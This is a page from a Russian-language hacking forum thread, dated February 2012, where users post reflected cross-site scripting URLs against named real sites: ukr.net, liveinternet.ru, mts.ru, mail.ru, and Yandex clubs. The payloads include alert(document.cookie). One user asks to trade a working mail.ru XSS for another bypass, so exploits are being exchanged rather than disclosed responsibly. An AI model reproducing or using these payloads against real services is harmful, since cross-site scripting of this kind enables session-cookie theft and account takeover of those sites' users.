HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 22 из 25 « Первая < 12 18 19 20 21 22 23 24 25 >
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 05.02.2012, 16:09
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию
[CODE]
Code:
http://kino.ukr.net/persons/search?query=">alert('xss')

Также есть активная XSS на самой странице видео.

Уязвимое место "теги"
 
Ответить с цитированием

  #212  
Старый 05.02.2012, 21:31
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию
LiveInternet.Ru
  • POST Запрос

    Код:
    Code:
http://liveinternet.ru/importmail.php?cmd=getbook_icq&addicqs=111">alert(/xss/)


  • Код:
    Code:
http://liveinternet.ru/flashes.php?id=58259&page=0&filter=">alert('xss')


  • Код:
    Code:
http://liveinternet.ru/flashes.php?id=629&page=1&userid=&cardinfo=">alert('xss')


  • Код:
    Code:
http://litube.li.ru/yandex/?search_string=111">alert('xss')
 
Ответить с цитированием

  #213  
Старый 09.02.2012, 19:59
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию
Ya.ru

Уязвимый код:

Код:
Code:
1) Заходим на clubs.ya.ru

2) Жмякаем на "Записать мысль"

3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"

XSS Выполняется.
 
Ответить с цитированием

  #214  
Старый 10.02.2012, 00:21
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от kravch_v  
kravch_v said:
3) Пишем в "HTML-Режиме" уязвимый код и переходим в режим "с оформлением"
XSS Выполняется.
Это не пассивка, а DOM-based
 
Ответить с цитированием

  #215  
Старый 10.02.2012, 01:11
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию
Цитата:
Сообщение от M_script  
M_script said:
Это не пассивка, а DOM-based
Но тем не менее.

Еще видел одну маленькую дырочку, но раскрутить так и не смог. (Фильтруются , и еще несколько HTML-Тегов).

,
- выводятся.
 
Ответить с цитированием

  #216  
Старый 10.02.2012, 14:41
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию
Код:
Code:
http://pulse.mts.ru/search?q=">alert(document.cookie)
 
Ответить с цитированием

  #217  
Старый 22.02.2012, 18:33
jacklndn
Guest
Сообщений: n/a
Провел на форуме:
3380

Репутация: 0
По умолчанию
На мaил есть рабочая хcс?

Мoгу пoменяться на oбхoд 704 oшибки
 
Ответить с цитированием

  #218  
Старый 26.02.2012, 10:56
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 6
По умолчанию
Xss на mail.ru

Работает не во всех платформах OC на Windows 7 не пашет.

Код:
Code:
http://search.enc.mail.ru/search_enc?q=">
 
Ответить с цитированием

  #219  
Старый 26.02.2012, 12:03
jacklndn
Guest
Сообщений: n/a
Провел на форуме:
3380

Репутация: 0
По умолчанию
Цитата:
Сообщение от Unix@  
Unix@ said:
Xss на mail.ru
Работает не во всех платформах OC на Windows 7 не пашет.
на xp тоже не пашет
 
Ответить с цитированием

  #220  
Старый 26.02.2012, 13:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 6
По умолчанию
xss mail.ru

Не знаю почему у меня работает,честно.
 
Ответить с цитированием
Ответ
Страница 22 из 25 « Первая < 12 18 19 20 21 22 23 24 25 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ